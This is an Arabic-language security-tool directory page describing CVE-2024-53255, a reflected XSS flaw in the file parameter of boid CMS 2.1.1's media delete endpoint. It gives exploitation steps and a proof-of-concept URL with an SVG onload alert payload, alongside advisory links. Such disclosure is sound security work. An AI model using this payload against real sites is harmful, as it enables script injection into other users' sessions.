Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-53255 — boid CMS 2.1.1 - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS) | Kitploit
أدوات/GitHubGitHub/0x4m3r/cve-2024-53255
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHub0x4m3r/cve-2024-53255

CVE-2024-53255

boid CMS 2.1.1 - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS)

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-53255

boid CMS 2.1.1 - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS)

الوصف:

توجد ثغرة XSS منعكسة في نقطة النهاية /admin?page=media في معامل file، مما يسمح للمهاجم بحقن كود JavaScript عشوائي.

خطوات الاستغلال:

1- سجّل الدخول إلى CMS وانتقل إلى صفحة الحذف (/admin?page=media).

2- اختر أي ملف لحذفه واعترض الطلب باستخدام أداة بروكسي.

3- عدّل معامل file في الطلب المعترض ليكون:

root@kitploit:~
<svg+onload%3dalert(document.domain)>

4 - أرسل الطلب المعدّل وسيتم تنفيذ السكريبت المحقون.

إثبات المفهوم (PoC):

root@kitploit:~
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4

للتفاصيل: https://nvd.nist.gov/vuln/detail/CVE-2024-53255 https://www.cve.org/CVERecord?id=CVE-2024-53255 https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7 https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r

تنزيل الأداة